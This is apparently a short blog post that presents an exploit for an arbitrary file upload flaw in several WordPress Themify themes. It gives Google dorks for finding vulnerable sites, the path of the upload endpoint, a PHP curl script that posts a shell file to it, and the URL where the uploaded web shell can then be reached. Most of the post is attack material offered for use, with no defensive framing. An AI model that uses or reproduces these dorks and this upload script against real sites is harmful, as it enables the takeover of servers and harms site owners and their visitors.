Wordpress Themify Arbitrary File Upload Vulnerability
Dorks:
inurl:"/wp-content/themes/Elemin/" inurl:"/wp-content/themes/Bloggie/" inurl:"/wp-content/themes/Tisa/" inurl:"/wp-content/themes/Funki/" inurl:"/wp-content/themes/Pinboard/" inurl:"/wp-content/themes/FOlo/" inurl:"/wp-content/themes/grido/" inurl:"/wp-content/themes/Suco/" inurl:"/wp-content/themes/iThemes2/"Exploit:
www.site.domin/wp-content/themes/select a theme/themify/themify-ajax.phpDemo: http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php Scirpt CSRF :
<?php
$uploadfile="inc0vers.php";$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);
print "$postResult";?>
Shell Akded:
http://yourtarget.com/wp-content/themes/select a theme/uploads/shellname.php
Wordpress Themify Arbitrary File Upload Vulnerability
Reviewed by Izza009
on
04.57
Rating:
Reviewed by Izza009
on
04.57
Rating:
Tidak ada komentar: